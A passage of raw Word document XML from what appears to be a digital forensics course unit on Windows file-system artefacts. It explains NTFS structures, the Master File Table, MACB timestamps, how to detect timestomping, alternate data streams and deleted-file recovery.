          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Why this works:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> it protects volatile state, blocks network contact, and keeps documentation complete.</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III — Windows &amp; Linux Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once an image is acquired, the investigator must know </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">where to look</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside it. Operating systems keep a constant record of what users and programs do — in the file system, the registry, logs and many small system files. These records are called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">artefacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This unit explains the most important Windows and Linux artefacts and how to combine them into a timeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Windows File System Internals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FAT vs NTFS — overview</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file system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the method an operating system uses to name, store and find files on a disk. Windows uses mainly two families: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (older, simple) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NTFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (modern, default for Windows drives).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3655"/>
        <w:gridCol w:w="3654"/>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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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FAT (FAT32 / exFAT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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NTFS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Used in</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USB drives, memory cards, cameras, older Windows</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All modern Windows system and data drives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Core structure</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Allocation Table (a chain of cluster numbers) + directory entries</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Master File Table (MFT) — a database record for every file and folder</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Max file size</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FAT32: 4 GB; exFAT: very large</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Extremely large (practically unlimited)</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Security / permissions</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None</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permissions (ACLs), encryption (EFS), compression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Journaling</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Yes — $LogFile and $UsnJrnl record changes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Timestamps</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Created, modified, accessed (access = date only; 2-second resolution for modified)</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Four timestamps (MACB) with 100-nanosecond precision, stored in UTC</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Forensic value</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Less metadata; deleted file’s first cluster number is wiped in the table, so recovery of fragmented files is harder</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Rich metadata, journals and alternate data streams — much more evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NTFS structure and special metadata files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NTFS stores everything about the volume as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, including its own metadata. Names of these system files begin with a dollar sign ($). They are normally hidden but visible in forensic tools.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Metadata file</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Forensic use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$MFT</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Master File Table — one record for every file and folder</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Names, sizes, timestamps, location of data; basis of deleted-file recovery</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$MFTMirr</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Backup copy of the first few MFT records</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Used when the MFT is damaged</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$LogFile</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Transaction log of recent changes to file-system metadata</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very recent file creation, deletion, rename — useful for timestomp detection</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$UsnJrnl</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Change journal listing file changes (create, delete, rename, close)</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Proves a file existed even if it was later deleted</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$Bitmap</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Records which clusters are used or free</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Identify unallocated space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$Boot</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Boot sector with volume information</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Cluster size, location of $MFT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Master File Table (MFT)</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MFT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the heart of NTFS. Each file or folder has at least one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MFT record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usually 1 KB) holding the details NTFS needs to manage it. A record is made of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">attributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The most important ones for forensics are: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holds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$STANDARD_INFORMATION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four timestamps (MACB), flags (hidden, read-only), owner information. Timestamps here can be changed by user-level tools.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$FILE_NAME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name, parent folder and a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">second</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> set of four timestamps. These are updated only by the operating system kernel, so they are harder to fake.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$DATA</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contents of the file. Small files (under about 600–700 bytes) are stored </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">inside the MFT record itself</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resident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">); larger files point to clusters elsewhere on disk (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">non-resident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, described by a data run list).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because an MFT record carries the file’s name, size, timestamps and cluster locations, an investigator can learn a great deal even if the file has been deleted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MACB timestamps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462"/>
        <w:gridCol w:w="2924"/>
        <w:gridCol w:w="5360"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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Letter</w:t>
            </w:r>
          </w:p>
        </w:tc>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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="53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Modified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Last time the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the file changed</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Accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Last time the file was read. May not be updated on modern Windows (disabled by default for performance), so do not rely on it</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Changed (MFT entry changed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Last time the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">metadata</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> changed (rename, permissions, move). Not the same as creation</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B</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Born (Created)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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When the file was created on this volume</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Interpreting timestamps</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Copying a file to a new location usually gives the copy a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">new Created time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, while it keeps the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">old Modified time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. So a file with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Modified earlier than Created</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a classic sign that it was copied from somewhere else — for example from a USB drive. Also remember Windows stores times in UTC; convert to local time carefully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Timestomping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — attackers use tools to change timestamps in $STANDARD_INFORMATION so a malicious file looks old. Comparing it with the $FILE_NAME timestamps (and $LogFile / $UsnJrnl) can reveal the trick.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternate Data Streams (ADS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NTFS allows a file to have more than one data stream. The normal content is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">unnamed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stream; extra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">named</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> streams (for example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">report.txt:secret.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) are not shown in Explorer and do not change the visible file size. They have legitimate uses — Windows itself stores the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zone.Identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stream on files downloaded from the internet (“Mark of the Web”) — but can also be used to hide data or malware. Investigators list files with streams and check what they contain. (Useful clue: Zone.Identifier tells where a file was downloaded from.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Deleted file recovery from NTFS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ What happens when an NTFS file is deleted</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E6F2F2" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">File exists: MFT record is active, clusters allocated</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DCEBF5" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">File is deleted: MFT record flag set to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">inactive / not in use</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E6F2F2" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Clusters are marked free in $Bitmap</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pBdr>
                <w:top w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:bottom w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:left w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
                <w:right w:val="single" w:color="0E7C7B" w:sz="6" w:space="4"/>
              </w:pBdr>
              <w:shd w:fill="DCEBF5" w:val="clear"/>
              <w:spacing w:after="0" w:before="0"/>
              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Data stays on disk — name, size, timestamps often remain in the record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
          </w:tcPr>
